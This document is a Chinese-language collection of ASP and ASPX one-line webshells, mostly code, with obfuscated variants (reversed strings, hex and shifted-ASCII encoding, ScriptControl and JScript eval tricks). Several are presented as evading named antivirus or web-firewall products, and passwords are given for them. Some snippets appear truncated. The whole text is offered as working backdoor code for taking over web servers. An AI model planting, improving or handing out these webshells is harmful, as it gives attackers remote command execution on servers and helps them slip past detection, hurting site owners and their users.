ASP一句话木马收集:
""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
"" then ExecuteGlobal request("c") end if %>
< %'
UTF-7编码加密:
Script Encoder 加密 //密码c
这段代码将"eval request(/*/z/*/)"逆序成")/*/z/*/(tseuqer lave", 以逃避特征码查杀, 当脚本被访问, 其代码会被动态的解码还原成原始的一句话后门. 当前90%以上的未知后门和变形后门都是使用此类动态解码技术
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>
密码 z
可以躲过雷客图的一句话木马:
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
password=Request("class")
Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
%>
password=Request("class")
Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
%>
简单的aspx免杀
var a = Request.Item["M"];var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//主要就是这个地方 其他地方好像不会管
eval(a,b);
Response.Write("Test");%>
过狗一句话:
'
''''''''''''''''''
'''''''''play = request("#")%>Error
参考资料:
一些常见的webshell后门的特征码 https://zhuanlan.zhihu.com/p/22149072
有关一句话后门的收集与整理 http://book.51cto.com/art/201204/328741.htm
asp执行cmd实例 http://m.blog.csdn.net/woswod/article/details/63253494